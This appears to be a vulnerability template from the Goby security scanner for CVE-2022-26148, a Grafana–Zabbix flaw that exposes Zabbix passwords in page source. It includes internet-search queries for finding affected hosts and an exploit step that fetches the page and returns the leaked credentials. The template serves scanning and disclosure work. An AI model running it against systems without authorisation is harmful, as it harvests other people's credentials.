mirror of https://github.com/qwqdanchun/Goby.git
165 lines
6.9 KiB
JSON
165 lines
6.9 KiB
JSON
{
|
||
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
|
||
"Description": "<p>Grafana is a set of open source monitoring tools provided by Grafana Labs that provide a visual monitoring interface. This tool is mainly used to monitor and analyze Graphite, InfluxDB and Prometheus, etc.<br></p><p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
|
||
"Product": "Grafana",
|
||
"Homepage": "https://grafana.com",
|
||
"DisclosureDate": "2022-03-30",
|
||
"Author": "abszse",
|
||
"FofaQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
|
||
"GobyQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
|
||
"Level": "3",
|
||
"Impact": "p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
|
||
"Recommendation": "<p>Pay attention to the official website update in time: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
|
||
"References": [
|
||
"https://2k8.org/post-319.html"
|
||
],
|
||
"Is0day": false,
|
||
"HasExp": true,
|
||
"ExpParams": [],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/",
|
||
"follow_redirect": false,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "zabbix",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "alexanderzobnin-zabbix-datasource",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "password\":\"",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/",
|
||
"follow_redirect": false,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "alexanderzobnin-zabbix-datasource",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "password",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody||"
|
||
]
|
||
}
|
||
],
|
||
"Tags": [
|
||
"Information Disclosure"
|
||
],
|
||
"VulType": [
|
||
"Information Disclosure"
|
||
],
|
||
"CVEIDs": [
|
||
"CVE-2022-26148"
|
||
],
|
||
"CNNVD": [
|
||
"CNNVD-202203-1938"
|
||
],
|
||
"CNVD": [
|
||
""
|
||
],
|
||
"CVSSScore": "9.8",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "Grafana 集成 Zabbix 存在信息泄露漏洞(CVE-2022-26148)",
|
||
"Product": "Grafana",
|
||
"Description": "<p>Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。<br></p><p>Grafana 7.3.4版本及之前版本存在安全漏洞,该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时,Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时,可以右键查看源码,使用Ctrl-F在api_jsonrpc.php中搜索password,可以发现Zabbix的账号密码和URL地址。<br></p>",
|
||
"Recommendation": "<p>及时关注官网更新:<a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
|
||
"Impact": "<p>Grafana 7.3.4版本及之前版本存在安全漏洞,该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时,Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时,可以右键查看源码,使用Ctrl-F在api_jsonrpc.php中搜索password,可以发现Zabbix的账号密码和URL地址。<br></p>",
|
||
"VulType": [
|
||
"信息泄漏"
|
||
],
|
||
"Tags": [
|
||
"信息泄漏"
|
||
]
|
||
},
|
||
"EN": {
|
||
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
|
||
"Product": "Grafana",
|
||
"Description": "<p>Grafana is a set of open source monitoring tools provided by Grafana Labs that provide a visual monitoring interface. This tool is mainly used to monitor and analyze Graphite, InfluxDB and Prometheus, etc.<br></p><p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
|
||
"Recommendation": "<p>Pay attention to the official website update in time: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
|
||
"Impact": "<p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
|
||
"VulType": [
|
||
"Information Disclosure"
|
||
],
|
||
"Tags": [
|
||
"Information Disclosure"
|
||
]
|
||
}
|
||
},
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |